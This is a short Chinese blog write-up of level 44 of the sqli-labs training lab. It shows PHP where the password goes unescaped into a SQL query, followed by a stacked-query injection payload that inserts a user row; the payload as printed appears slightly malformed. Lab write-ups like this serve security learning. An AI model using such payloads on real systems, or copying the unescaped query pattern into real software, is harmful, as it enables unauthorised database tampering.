• sqli-labs(44)

    第四十四关

    本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息

    过滤点:

   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

sql语句:

  $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

复制代码

    那么这不是 直接构造payload吗?

    随意输入用户名,密码如下:

paload:
a';insert into users values(107,'aaa''aaa')#
  • 相关阅读:
    117. Populating Next Right Pointers in Each Node II
    50. Pow(x, n)
    494. Target Sum
    Word Ladder
    HDU 4417
    POJ 2104
    POJ 3277
    【转】图论500题
    POJ 2991
    POJ 1436
  • 原文地址:https://www.cnblogs.com/-zhong/p/10965268.html
Copyright © 2020-2023  润新知